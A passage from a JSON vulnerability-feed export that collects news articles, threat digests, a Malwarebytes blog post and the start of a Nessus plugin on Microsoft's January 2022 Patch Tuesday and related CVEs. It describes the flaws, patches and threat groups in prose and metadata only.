applied immediately to counter potential real-world attacks targeting the weaknesses. The U.S. 
National Security Agency (NSA) has been acknowledged for flagging CVE-2022-21846.\n\n\"This massive Patch Tuesday comes during a time of chaos in the security industry whereby professionals are working overtime to remediate [Log4Shell](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) \u2014 reportedly the worst vulnerability seen in decades,\" Bharat Jogi, director of vulnerability and threat Research at Qualys, said.\n\n\"Events such as Log4Shell [\u2026] bring to the forefront the importance of having an automated inventory of everything that is used by an organization in their environment,\" Jogi added, stating \"It is the need of the hour to automate deployment of patches for events with defined schedules (e.g., MSFT Patch Tuesday), so security professionals can focus energy to respond efficiently to unpredictable events that pose dastardly risk.\"\n\n### Software Patches from Other Vendors\n\nBesides Microsoft, security updates have also been released by other vendors to rectify several vulnerabilities, counting \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-01-01>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Google Chrome](<https://thehackernews.com/2022/01/google-releases-new-chrome-update-to.html>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and 
[SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2022-January/thread.html>)\n * Mozilla [Firefox](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-01/>), [Firefox ESR](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-02>), and [Thunderbird](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-03/>)\n * [Samba](<https://www.samba.org/samba/history/security.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=596902035>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [VMware](<https://thehackernews.com/2022/01/vmware-patches-important-bug-affecting.html>), and\n * [WordPress](<https://wordpress.org/news/2022/01/wordpress-5-8-3-security-release/>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-12T06:42:00", "type": "thn", "title": "First Patch Tuesday of 2022 Brings Fix for a Critical 'Wormable' Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21846", "CVE-2022-21849", "CVE-2022-21855", "CVE-2022-21874", "CVE-2022-21893", "CVE-2022-21907", "CVE-2022-21919", "CVE-2022-21969"], "modified": "2022-01-16T08:40:23", "id": "THN:00A15BC93C4697B74FA1D56130C0C35E", "href": "https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here\n\nPublished Vulnerabilities: 340 | Interesting Vulnerabilities: 10 | Active Threat Groups: 5 | Targeted Countries: 53 | Targeted Industries: 24 | ATT&CK TTPs: 84\n\nThe fourth week of March 2022 witnessed the discovery of 340 vulnerabilities, of which 10 gained the attention of threat actors and security researchers worldwide. Among these 10, 1 is undergoing reanalysis and 2 were not present in the NVD at all. The Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. Lapsus$, a new extortion threat actor group that had attacked popular organizations such as the Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Okta, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, the North Korean state hackers known as Lazarus Group were exploiting a zero-day vulnerability in the Google Chrome web browser (CVE-2022-0609). 
AvosLocker, a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations, is currently exploiting the ProxyShell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35, aka Magic Hound, an Iranian-backed threat group, is exploiting the ProxyShell vulnerabilities to attack organizations across the globe. Another group, the South Korean APT DarkHotel, was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below.\n\nDetailed Report:\n\nInteresting Vulnerabilities (CVEs and patch links):\n * CVE-2021-34484, CVE-2022-21919: https://central.0patch.com/auth/login\n * CVE-2022-0609*, CVE-2022-1096*: https://www.google.com/intl/en/chrome/?standalone=1\n * CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855\n * CVE-2022-0543: https://security-tracker.debian.org/tracker/CVE-2022-0543\n\nActive Actors (Name | Origin | Motive):\n * APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) | Iran | Information theft and espionage\n * AvosLocker | Unknown | Ecrime, information theft, and financial gain\n * Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) | North Korea | Information theft and espionage, sabotage and destruction, financial crime\n * Lapsus$ (DEV-0537) | Unknown | Data theft and destruction\n * DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) | South Korea | Information theft and espionage\n\nTargeted Location: (figure)\nTargeted Sectors: (figure)\n\nCommon TTPs:\nTactics: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact\nTechniques: T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: 
Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job 
T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T15:30:50", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here. Microsoft has fixed 97 vulnerabilities, with nine classified as Critical and 88 as Important and among them 6 zero-days. Following are the type of security vulnerabilities reported in multiple Microsoft products: 41 Elevation of Privilege Vulnerabilities 29 Remote Code Execution Vulnerabilities 9 Security Feature Bypass Vulnerabilities 6 Information Disclosure Vulnerabilities 9 Denial of Service Vulnerabilities 3 Spoofing Vulnerabilities Six zero-day vulnerabilities were addressed in the January\u2019s patch Tuesday: CVE-2021-22947: Remote Code-Execution vulnerability in open-source Curl library. CVE-2021-36976: Remote Code-Execution vulnerability in open-source Libarchive. CVE-2022-21874: Remote Code-Execution vulnerability in Local Windows Security Center API. CVE-2022-21919: Privilege escalation vulnerability in Windows User Profile Service. CVE-2022-21839: Denial-of-Service vulnerability in Windows Event Tracing Discretionary Access Control List. CVE-2022-21836: Spoofing vulnerability in Windows Certificate. 
Some of the critical vulnerabilities are listed below: CVE-2022-21846: Remote Code-Execution vulnerability in Microsoft exchange server which. CVE-2022-21840: Remote Code-Execution vulnerability in Microsoft Office 365. CVE-2022-21857: Active Directory Domain Services Elevation of Privilege Vulnerability CVE-2022-21898: Privilege escalation vulnerability in DirectX Graphics. CVE-2022-21912: DirectX Graphics Kernel Remote Code Execution Vulnerability. CVE-2022-21907: HTTP Protocol Stack Remote Code-Execution Vulnerability CVE-2022-21917: HEVC Video Extensions Remote Code-Execution Vulnerability. Out of the critical bugs, a Remote Code-Execution (CVE-2022-21907) issue in the HTTP protocol stack (HTTP.sys) used as a protocol listener for processing HTTP requests by the Windows Internet Information Services (IIS) web server. Successful exploitation requires an attacker to send maliciously crafted packets to targeted Windows servers, which use the vulnerable HTTP Protocol Stack for processing packets. Hive Pro threat researchers recommend users to prioritize patching this flaw on all the affected servers since it could allow unauthenticated attackers to remotely execute arbitrary code in low complexity attacks and "in most situations," without requiring user interaction. 
Vulnerability Details Patch Links https://msrc.microsoft.com/update-guide/ References https://www.bleepingcomputer.com/microsoft-patch-tuesday-reports/Jan-2022.html https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/ https://www.bleepingcomputer.com/news/microsoft/microsoft-new-critical-windows-http-vulnerability-is-wormable/ https://www.bleepingcomputer.com/news/microsoft/microsoft-new-critical-windows-http-vulnerability-is-wormable/ https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-12T07:30:07", "type": "hivepro", "title": "Microsoft Patch Tuesday fixes critical zero-days along with 97 other flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21846", "CVE-2022-21857", "CVE-2022-21874", "CVE-2022-21898", "CVE-2022-21907", "CVE-2022-21912", "CVE-2022-21917", "CVE-2022-21919"], "modified": "2022-01-12T07:30:07", "id": "HIVEPRO:C224B728F67C8D1703A8BF2411600695", "href": 
"https://www.hivepro.com/microsoft-patch-tuesday-fixes-critical-zero-days-along-with-97-other-flaws/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-01-18T21:32:10", "description": "How time flies sometimes. Microsoft yesterday released the first [patch Tuesday security updates of the year 2022](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan>). The update includes fixes for six zero-day vulnerabilities and a total of 97 bugs. This includes two Remote Code Execution (RCE) vulnerabilities affecting open source libraries. None of the zero-day flaws are known to have been exploited in the wild, but one of the other vulnerabilities is feared to be a wormable one.\n\nA [severe word](<https://www.askwoody.com/newsletter/ms-defcon-1-business-patchers-be-on-alert/>) of warning for those running a network with a domain controller: the side effects this month are extreme. The advice is to hold off on the patch. Microsoft has a technology called Active Directory that allows workstations to authenticate with a \u201cdomain controller.\u201d This month\u2019s updates are causing such drastic issues with domain controllers that they can become stuck in a boot loop.\n\nPatches that can cause problems include the following:\n\n * [KB5009624](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009624-monthly-rollup-23f4910b-6bdd-475c-bb4d-c0e961aff0bc>) for Server 2012 R2\n * [KB5009595](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009595-security-only-update-060870c2-ad08-40e5-b000-a9f6d40c0831>) for Server 2012 R2\n * [KB5009546](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009546-os-build-14393-4886-0c2cac57-13b6-42e6-b318-41ca32428f91>) for Server 2016\n * [KB5009557](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009557-os-build-17763-2452-c3ee4073-1e7f-488b-86c9-d050672437ae>) for Server 2019\n\nIt\u2019s unclear if Server 2022 is similarly 
impacted.\n\nAlong with the update comes an [announcement](<https://msrc-blog.microsoft.com/2022/01/11/coming-soon-new-security-update-guide-notification-system/>) of a new security update guide notification system.\n\nLet\u2019s start by taking a closer look at the zero-days. Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The first two we listed below have previously been fixed by a third party and are now being incorporated into Microsoft products.\n\n## Open Source Curl RCE vulnerability\n\n[CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>) is regarding a vulnerability in the curl open source library which is used by Windows. The January 2022 Windows Security Updates includes the most recent version of this library which addresses this vulnerability and others. The listed one can lead to a STARTTLS protocol injection via a Man-In-The-Middle attack.\n\nThe software, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted. More specifically, when curl connects to an IMAP, POP3, SMTP or FTP server to exchange data securely using STARTTLS to upgrade the connection to TLS level, the server can still respond and send back multiple responses before the TLS upgrade. Such multiple pipelined responses are cached by curl. curl would then upgrade to TLS but not flush the in-queue of cached responses and instead use and trust the responses it got before the TLS handshake as if they were authenticated.\n\n## Libarchive RCE vulnerability\n\n[CVE-2021-36976](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>) is regarding a vulnerability in the libarchive open source library which is used by Windows. 
The January 2022 Windows Security Updates include the most recent version of this library which addresses the vulnerability and others. This vulnerability is described as libarchive 3.4.1 through 3.5.1 has a use-after-free in copy_string (called from do_uncompress_block and process_block).\n\n## Windows Certificate Spoofing vulnerability\n\n[CVE-2022-21836](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21836>) allows an attacker to bypass a security feature. A successful attacker could bypass the Windows Platform Binary Table (WPBT) verification by using a small number of compromised certificates. Microsoft has added those certificates to the Windows kernel driver block list, driver.stl. The Windows Platform Binary Table is a fixed firmware ACPI (Advanced Configuration and Power Interface) table. It was introduced by Microsoft to allow its vendors to execute programs every time a device boots. Certificates on the driver.stl will be blocked even if present in the WPBT.\n\n## Windows Event Tracing Discretionary Access Control List Denial of Service vulnerability\n\n[CVE-2022-21839](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21839>) does not provide us with a lot of details. Affected is some unknown processing of the component Event Tracing Discretionary Access Control List. The exploitability is said to be easy, and it is possible to launch the attack remotely. Required for exploitation is an authentication. A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or resource, making it inaccessible to its intended users.\n\n## Windows Security Center API RCE vulnerability\n\n[CVE-2022-21874](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21874>) is a publicly disclosed RCE vulnerability in the Windows Security Center API that received a [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 7.8. 
This vulnerability requires user interaction to exploit, and the attack vector is local.\n\n## Windows User Profile Service Elevation of Privilege (EoP) vulnerability\n\n[CVE-2022-21919](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919>) is a publicly disclosed EoP vulnerability in the Windows User Profile Service API that has received a CVSS score of 7.0. The exploitation is known to be difficult, but the attack may be initiated remotely. The requirement for exploitation is a simple authentication.\n\n## HTTP Protocol Stack RCE vulnerability\n\n[CVE-2022-21907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907>) is not one of the zero-days, but it stands out because it is a critical vulnerability which could allow an unauthenticated attacker to send a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (http.sys) to process packets. While this is a vulnerability that would mostly affect servers, the fact that it requires no user interaction, there are no privileges required and it targets an elevated service makes experts believe it is [wormable](<https://www.bleepingcomputer.com/news/microsoft/microsoft-new-critical-windows-http-vulnerability-is-wormable/>). There are also some [questions](<https://twitter.com/SecGuru_OTX/status/1481176886843686912>) among experts about which Windows versions are vulnerable.\n\n## The new security update guide notification system\n\nNotifications are sent when information is added or changed in the Security Update Guide. Based on feedback, Microsoft has been working to make signing up for and receiving Security Update Guide notifications easier. Starting today, you can sign up with any email address that you want and receive notifications at that email address. 
There is no longer a requirement that the email be a Live ID.\n\nTo start off, you will need to create a Security Update Guide profile by clicking \u201cSign in\u201d at the top right corner of the [Security Update Guide](<https://msrc.microsoft.com/update-guide>). You can use any email and password here. If this is your first time signing in, a validation email will be sent with steps to verify that you have entered a valid email address.\n\n## Other security updates\n\nDon't forget to look at other security updates that you may need. We have seen updates from:\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-01-01>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=596902035>)\n * [VMWare](<https://www.vmware.com/security/advisories/VMSA-2022-0001.html>)\n\n## Update January 18\n\nMicrosoft has released emergency out-of-band (OOB) updates to address multiple issues caused by Windows Updates issued during the January 2021 Patch Tuesday. 
For those that were experiencing problems or holding off on the updates, this update addresses issues related to VPN connectivity, Windows Server Domain Controllers restarting, Virtual Machines start failures, and ReFS-formatted removable media failing to mount.\n\nStay safe, everyone!\n\nThe post [[updated] You can update now: Microsoft patches 97 bugs including 6 zero-days and a wormable one](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/update-now-microsoft-patches-97-bugs-including-6-zero-days-and-a-wormable-one/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-12T17:02:25", "type": "malwarebytes", "title": "[updated] You can update now: Microsoft patches 97 bugs including 6 zero-days and a wormable one", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21874", "CVE-2022-21907", "CVE-2022-21919"], "modified": "2022-01-12T17:02:25", "id": "MALWAREBYTES:DACEDE0F6B5888B6C6E281338C4B9980", "href": 
"https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/update-now-microsoft-patches-97-bugs-including-6-zero-days-and-a-wormable-one/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005095 or cumulative update 5005090. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005095: Windows Server 2008 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005095.NASL", "href": "https://www.tenable.com/plugins/nessus/152425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152425);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005095\");\n script_xref(name:\"MSKB\", value:\"5005090\");\n script_xref(name:\"MSFT\", value:\"MS21-5005095\");\n script_xref(name:\"MSFT\", value:\"MS21-5005090\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005095: Windows Server 2008 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005095\nor cumulative update 5005090. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-36936, CVE-2021-36937,\n CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. 
